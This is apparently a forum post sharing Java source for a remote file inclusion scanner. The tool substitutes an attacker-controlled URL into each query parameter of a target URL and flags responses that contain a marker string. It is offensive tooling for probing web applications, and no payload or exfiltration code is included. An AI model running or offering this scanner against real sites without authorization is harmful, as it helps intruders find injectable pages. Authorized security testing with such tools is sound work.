hozarares

RFI Scanner (Java)


:::=== RFISCANNER.JAVA ===:::

package rrfiscanner;

import java.io.BufferedReader;

import java.io.IOException;

import java.io.InputStreamReader;

import java.net.MalformedURLException;

import java.net.Proxy;

import java.net.URL;

import java.net.URLConnection;

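/**
 * Requests every URL produced by {@link PrepareURL} for a target address and reports the ones
 * whose response body contains a configured marker string.
 *
 * <p>A report means only that the marker text appeared somewhere in the response. A page that
 * echoes the substituted parameter value back to the client also matches when the marker is part
 * of that value, so each reported URL is a candidate to confirm manually, not a confirmed finding.
 *
 * <p>Instances hold mutable, unsynchronized configuration and are meant to be used from one thread.
 */
public class RfiScanner {

    /** Upper bound, in milliseconds, for opening a connection and for each blocking read. */
    private static final int TIMEOUT_MILLIS = 10000;

    private Proxy _conProxy;

    private boolean _useProxy;

    private String _SEARCH_WORD;

    private String _vUrl, _aUrl;

    /**
     * @param vUrl the target URL, including the query string whose parameters are substituted
     * @param aUrl the value written into each parameter in turn
     */
    public RfiScanner(String vUrl, String aUrl) {
        this._vUrl = vUrl;
        this._aUrl = aUrl;
    }

    /**
     * @param use true to send requests through the proxy given to {@link #setProxy(Proxy)}
     */
    public void setUseProxy(boolean use) {
        this._useProxy = use;
    }

    /**
     * @param proxy the proxy used when proxy use is enabled
     */
    public void setProxy(Proxy proxy) {
        this._conProxy = proxy;
    }

    /**
     * @param word the marker text looked for in each response line
     */
    public void setSearchWord(String word) {
        this._SEARCH_WORD = word;
    }

    /**
     * Requests each candidate URL and prints the ones whose response contains the marker.
     *
     * <p>Progress goes to standard output; configuration problems and per-URL I/O failures go to
     * standard error. A failure on one URL does not stop the remaining URLs from being checked.
     */
    public void scan() {
        // An empty marker matches every line, so every URL would be reported; a null one
        // would abort the run with a bare NullPointerException message.
        if (_SEARCH_WORD == null || _SEARCH_WORD.length() == 0) {
            System.err.println("No search word set; call setSearchWord() before scan()");
            return;
        }
        // URL.openConnection(Proxy) rejects a null proxy with IllegalArgumentException.
        if (_useProxy && _conProxy == null) {
            System.err.println("Proxy use is enabled but no proxy was set; call setProxy() before scan()");
            return;
        }

        try {
            PrepareURL candidates = new PrepareURL(_vUrl, _aUrl);
            while (candidates.hasNext()) {
                URL u = candidates.next();
                System.out.println("SCANNING: " + u.toString());
                try {
                    URLConnection uc = _useProxy ? u.openConnection(_conProxy) : u.openConnection();
                    // Without timeouts a host that never answers blocks the whole run.
                    uc.setConnectTimeout(TIMEOUT_MILLIS);
                    uc.setReadTimeout(TIMEOUT_MILLIS);
                    if (responseContainsMarker(uc)) {
                        System.out.println("VULNERABLE URL: " + u.toString());
                    }
                } catch (IOException ioe) {
                    // Best effort: note the failure and move on to the next candidate.
                    System.err.println("SKIPPED: " + u.toString() + " (" + ioe.toString() + ")");
                }
            }
        } catch (MalformedURLException mfue) {
            System.err.println(mfue.toString());
        } catch (Exception e) {
            System.err.println(e.toString());
        }
    }

    /**
     * Reads the response line by line and stops at the first line containing the marker.
     *
     * @param uc the connection whose response body is read
     * @return true if any line contains the marker text
     * @throws IOException if the response cannot be opened or read
     */
    private boolean responseContainsMarker(URLConnection uc) throws IOException {
        // Decode with a fixed charset so results do not depend on the platform default.
        BufferedReader reader = new BufferedReader(new InputStreamReader(uc.getInputStream(), "UTF-8"));
        try {
            String line;
            while ((line = reader.readLine()) != null) {
                if (line.indexOf(_SEARCH_WORD) != -1) {
                    return true;
                }
            }
            return false;
        } finally {
            // The original never closed the reader, leaking one stream per request.
            reader.close();
        }
    }
}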

:::=== PREPAREURL.JAVA ===:::

package rrfiscanner;

import java.net.MalformedURLException;

import java.net.URL;

import java.util.ArrayList;

import java.util.HashMap;

import java.util.Iterator;

import java.util.Set;

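/**
 * Builds, for one target URL, the list of variants in which a single query parameter's value has
 * been replaced by a caller-supplied value, and hands them out one at a time.
 *
 * <p>The substitution is a plain text replacement of {@code name=value} over the whole URL, so a
 * pair that also occurs inside another parameter (for example {@code id=1} inside {@code uid=1})
 * is rewritten there as well.
 */
public class PrepareURL {

    private static final int _nextItemInitialize = -1;

    private String _victimURL;

    private String _evilUrl;

    private ArrayList<URL> _attackUrlList;

    // Index of the element most recently returned by next(); -1 before the first call.
    private int _nextItem;

    /**
     * @param victimUrl the URL whose query parameters are substituted one at a time
     * @param attackUrl the value written into each parameter
     * @throws MalformedURLException if a generated URL cannot be parsed
     */
    public PrepareURL(String victimUrl, String attackUrl) throws MalformedURLException {
        this._victimURL = victimUrl;
        this._evilUrl = attackUrl;
        _nextItem = _nextItemInitialize;
        fillList();
    }

    /**
     * @return true if there is another element left, false otherwise
     */
    public boolean hasNext() {
        // "<" rather than "!=" so the answer stays false once the cursor is at the end.
        return _nextItem < _attackUrlList.size() - 1;
    }

    /**
     * @return the next URL
     * @throws IndexOutOfBoundsException if no element is left
     */
    public URL next() {
        // Fetch first so a failed call does not move the cursor past the end.
        URL url = _attackUrlList.get(_nextItem + 1);
        _nextItem++;
        return url;
    }

    /**
     * Resets the cursor so the URLs can be iterated again.
     */
    public void reset() {
        _nextItem = _nextItemInitialize;
    }

    /**
     * Fills the URL list with one variant per usable query parameter.
     *
     * @throws MalformedURLException if a generated URL cannot be parsed
     */
    private void fillList() throws MalformedURLException {
        _attackUrlList = new ArrayList<URL>();

        // Without a "?" there is no query string; the original treated the whole URL as one.
        int queryStart = _victimURL.indexOf("?");
        if (queryStart == -1) {
            return;
        }

        HashMap<String,String> paramPairs = getParameters(_victimURL.substring(queryStart + 1));
        for (String name : paramPairs.keySet()) {
            String current = name + "=" + paramPairs.get(name);
            _attackUrlList.add(new URL(_victimURL.replace(current, name + "=" + _evilUrl)));
        }
    }

    /**
     * Splits a query string into its parameters.
     *
     * <p>Pairs without a name or without a value are skipped.
     *
     * @param query the query string to split into parameter names and values
     * @return a HashMap of parameter name to parameter value
     */
    private HashMap<String,String> getParameters(String query) {
        HashMap<String,String> paramPairs = new HashMap<String,String>();
        String[] rawPairs = query.split("&");
        for (int i = 0; i < rawPairs.length; i++) {
            // Limit 2 keeps any further "=" inside the value instead of splitting on it.
            String[] keyValue = rawPairs[i].split("=", 2);
            if (keyValue.length == 2 && keyValue[0].length() > 0 && keyValue[1].length() > 0) {
                paramPairs.put(keyValue[0], keyValue[1]);
            }
        }
        return paramPairs;
    }
}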

Edited by hozarares